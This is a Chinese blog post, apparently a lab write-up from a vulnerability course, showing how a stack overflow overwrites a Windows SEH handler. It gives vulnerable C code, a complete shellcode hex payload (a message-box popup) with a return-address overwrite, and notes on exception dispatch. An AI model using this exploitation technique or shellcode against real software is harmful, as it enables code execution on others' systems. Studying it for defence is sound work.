栈溢出 狙击S.E.H

最新推荐文章于 2022-03-30 16:46:40 发布
最新推荐文章于 2022-03-30 16:46:40 发布
阅读量231 收藏
点赞数 1
分类专栏: # 堆&栈 文章标签: window 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Misaka10046/article/details/108705194
版权

代码

#include <windows.h>
#include <stdio.h>
char shellcode[] = "\x90\x90\x90\x90……";
DWORD MyExceptionhandler(void)
{
	printf("got an exception, press Enter to kill process!\n");
	getchar();
	ExitProcess(1);
	return 0;
}
void test(char * input)
{
	char buf[200];
	int zero=0;
	__asm int 3 //used to break process for debug
	__try
	{
		strcpy(buf,input); //overflow
		zero=4/zero; //异常
	}
	__except(MyExceptionhandler()){}
}
void main()
{
	test(shellcode);
}

当线程初始化时,会自动向栈中安装一个 S.E.H,作为线程默认的异常处理。自己加的这个S.E.H处于最优先级,然后才是线程的S.E.H,到了最后才是进程的S.E.H。S.E.H处理不了才会调用下一级的S.E.H。

实验目的

栈溢出修改S.E.H

实验准备

环境:windows 2k professional
编译器:vc++
调试器:OD

实验过程

1.先下一个断点,然后看栈中的情况就能找到存在栈中的S.E.H链中存放的地址,然后我们的目的就是覆盖掉异常时弹出的地址。等下除零异常的时候,就直接就调用覆盖了的地址。
在这里插入图片描述
2.对栈进行覆盖溢出的操作

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x68\xFE\x12\x00"

前面0xCC填充,中间的代码是之前那个弹出窗口的代码,然后最后覆盖的地址就是这段shellcode的开头地址。
在这里插入图片描述
然后异常的时候调用的就是自己被覆盖的S.E.H,之后就退出了程序

PS:异常处理流程S.E.H如下。
1 首先执行线程中距离栈顶最近的 S.E.H 的异常处理函数。
2 若失败,则依次尝试执行 S.E.H 链表中后续的异常处理函数。
3 若 S.E.H 链中所有的异常处理函数都没能处理异常,则执行进程中的异常处理。
4 若仍然失败,系统默认的异常处理将被调用,程序崩溃的对话框将被弹出。

CPU 执行时发生并捕获异常,内核接过进程的控制权,开始内核态的异常处理。
1 内核异常处理结束,将控制权还给 ring3。
2 ring3 中第一个处理异常的函数是 ntdll.dll 中的 KiUserExceptionDispatcher()函数。
3 KiUserExceptionDispatcher()首先检查程序是否处于调试状态。如果程序正在被调试,会将异常交给调试器进行处理。
4 在非调试状态下,KiUserExceptionDispatcher()调用 RtlDispatchException()函数对线程的 S.E.H 链表进行遍历,如果找到能够处理异常的回调函数,将再次遍历先前调用过的 S.E.H 句柄,即 unwind 操作(就是找到了就处理函数,把之前的遍历一遍让之前的函数都失效,不然就会栈有异常),以保证异常处理机制自身的完整性。
5 如果栈中所有的 S.E.H 都失败了,且用户曾经使用过SetUnhandledExceptionFilter()函数设定进程异常处理,则这个异常处理将被调用。
6 如果用户自定义的进程异常处理失败,或者用户根本没有定义进程异常处理,那么系统默认的异常处理 UnhandledExceptionFilter()将被调用。U.E.F 会根据注册表里的相关信息决定是默默地关闭程序,还是弹出错误对话框。

异常分发就是一个寻找调试器和异常处理代码的过程。异常有两大类,发生在内核态下的异常和发生在用户态下的异常。
这两者的相同点是:
1.都是基于二次调试机制 就是一次异常需要连续忽略两次才能跳过。
2.都在寻找调试器 异常是没有办法自己消失的,需要找到处理代码或者调试器才行,所提异常分发就是寻找解决方案的过程。
不同点是:
1.CPU模式的切换 用户态的函数会伴着切换到内核态,而内核态就不会切换。
2.同样使用的函数也不一样
在这里插入图片描述

0xwangliang
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初识栈溢出及利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5791
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
《0day安全》——利用 S.E.H
weixin_50287973的博客
09-07 211
利用 Windows 异常处理机制的基本思路 (1)S.E.H 存放在栈内,故溢出缓冲区的数据有可能淹没 S.E.H。 (2)精心制造的溢出数据可以把 S.E.H 中异常处理函数的入口地址更改为 shellcode 的起始地址。 (3)溢出后错误的栈帧或堆块数据往往会触发异常。 (4)当 Windows 开始处理溢出后的异常时,会错误地把 shellcode 当作异常处理函数而执行。 在栈溢出中利用 S.E.H 代码 #include "stdio.h" #include <windows.h>
栈溢出中利用S.E.H
weixin_44723038的博客
11-25 391
环境:Microsoft Visual C++ 6.0,Windows 10,OllyDbg 实验原理:通过改变handler指向的位置,使其指向构造的确定基址的动态链接库,改变程序中的栈,最终栈返回到NS.E.H的位置,再改变NS.E.H中的内容,即构造指令使其指向shellcode,完成此次攻击。 代码1:(通过多次尝试,利用MyExcept函数确定NS.E.H的位置) #include &...
重谈堆栈方向和栈溢出的利用(栈溢出攻击原理)
星空_MAX
03-30 2136
一般情况下,栈是从高地址向低地址增长,堆是从低地址向高地址增长 程序员习惯从低向高去读写内存,所以堆就是从低向高增长,而栈对此并不敏感,所以会有此内存布局
《0day安全》——狙击Windows异常处理机制(SEH)
sunr_的博客
08-26 314
《0day2》——狙击Windows异常处理机制(SEH) SEH的异常处理模型主要由__try __except语句来完成,与标准的try catch相似。 在栈溢出中利用SEH #include "stdafx.h" #include "stdio.h" #include <windows.h> char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
栈溢出是计算机安全领域中的一个重要概念,主要发生在程序运行过程中,由于栈空间分配不当,导致数据超出预定的栈帧范围,从而影响到其他栈帧中的数据,甚至可能破坏程序执行流程,造成安全风险。本篇文章将深入探讨...
栈溢出检查机制.pdf
11-09
栈溢出检查机制.pdf
02-栈和队列.zip
01-31
4. 堆栈溢出:当栈中元素过多,超过栈的容量时,会发生堆栈溢出错误。 队列的应用: 1. 打印任务:多个打印任务按照提交的顺序依次处理。 2. CPU调度:操作系统使用队列管理进程或线程的执行顺序。 3. 缓存:在LRU...
libgcc-s.so.1
05-31
4. **异常处理**:libgcc_s.so.1包含了用于处理程序运行时异常的代码,比如除以零错误、浮点溢出等。这些功能在许多程序中是必不可少的,因为它们可以捕获和处理潜在的运行时错误。 5. **线程局部存储(TLS)**:TLS...
文本溢出插件jquery.dotdotdot.js使用方法详解
10-19
文本溢出插件jquery.dotdotdot.js是一种非常实用的jQuery插件,主要用于解决网页中文本溢出容器时的处理问题。当页面中的文本内容超过了设定的容器高度,该插件可以让文本以省略号(...)的形式显示,以防止内容混乱...
漏洞利用原理(高级)
wk19951125的博客
08-28 223
SEHOPSEHOP原理攻击返回地址攻击虚函数利用未启用SEHOP的模块伪造S.E.H链表参考文献 SEHOP原理 开启SEHOP: 下载http://go.microsoft.com/?linkid=9646972的补丁,此补丁适于Windows’ 7和Windows Vista SP1。 手工在注册表中HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\C...
20181021学习笔记—内存攻击技术(202)
XiaoXuM_LXM的博客
10-21 425
《0day安全:软件漏洞分析技术》 我目前跨过了栈和堆的实践部分......因为......实践的时候遇到一些尴尬的问题,调试了很长时间,还是没有解决,所以我决定先到后面的章节看看。今天看的是第6章《形形色色的内存攻击技术》,内容基本都是书中原文,作者,写得真的太好了,虽然这本书有点老....但是我们需要了解历史,总结历史! S.H.E概述 异常处理机制:为了保证系统在遇到错误时,不至于奔...
二进制菜鸟之栈溢出漏洞利用思路
Blood_Pupil的博客
08-06 949
作为一只二进制菜鸟,不,应该是作为一只各安全领域的菜鸟,感觉二进制学的还是蛮开心的,每天也都能学到点新的东西,调试代码的过程也是非常令人开心。今天总结下目前学到的栈溢出漏洞的利用思路 栈溢出漏洞简介 我们知道C语言中有些字符串操作函数不会对字符串的长度进行检查,比如strcpy。 #include<stdio.h> #include<string.h> char nam...
逆向之利用地址覆盖执行Shellcode
菜鸟-传奇
04-26 327
逆向之利用地址覆盖执行Shellcode Shellcode Shellcode定义   Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码一般可以获取权限。 Shellcode的作用   Shellcode一般是作为数据发送给受攻击服务器的。Shellcode是溢出程序和蠕虫病毒的核心提到它自然就会和漏洞联想在一起。漏洞利用中最关键的是Shel...
堆溢出 代码植入 狙击RtlEnterCriticalSection()函数指针
Misaka10046的博客
09-20 2483
代码 #include <windows.h> char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90……"; int main() { HLOCAL h1 = 0, h2 = 0; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200); __asm int 3 //used to break process memcpy
堆溢出 对HeapFree函数的详细调试
Misaka10046的博客
09-23 1489
代码 #include <windows.h> int main() { HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); _asm int 3 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,3); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,5); h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,6); h4
堆溢出 对HeapAlloc函数的详细调试
Misaka10046的博客
09-23 739
代码 #include <windows.h> int main() { HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); _asm int 3 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,3); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,5); h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,6); h4
栈溢出 利用jmp esp绕过栈帧移位
Misaka10046的博客
09-16 549
实验代码 #include<stdio.h> #include<windows.h> #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[44]; authenticated = strcmp(password,PASSWORD); strcpy(buffer,password);//overflowed return authenti
栈溢出 控制程序的执行流程
Misaka10046的博客
09-15 380
实验代码 #include<stdio.h> #include<string.h> #include<stdlib.h> #define PASSWORD "1234567" int verify_password (char *password) { int authenticated; char buffer[8]; authenticated=strcmp(password,PASSWORD); strcpy(buffer,password);//overf
css 溢出显示...
最新发布
10-11
CSS 溢出显示一般使用 overflow 属性来控制。当元素内部的内容超出了元素的大小时,就会产生溢出。overflow 属性可以设置以下值: 1. visible:默认值,内容会溢出到元素外部显示。 2. hidden:内容会被裁剪,不显示溢出内容。 3. scroll:会显示滚动条,用户可以滚动查看溢出内容。 4. auto:自动显示滚动条,只显示必要的滚动条。 例如,我们可以这样控制一个元素的溢出显示: ```css div { width: 200px; height: 200px; overflow: scroll; /* 当内容超出 div 大小时,显示滚动条 */ } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值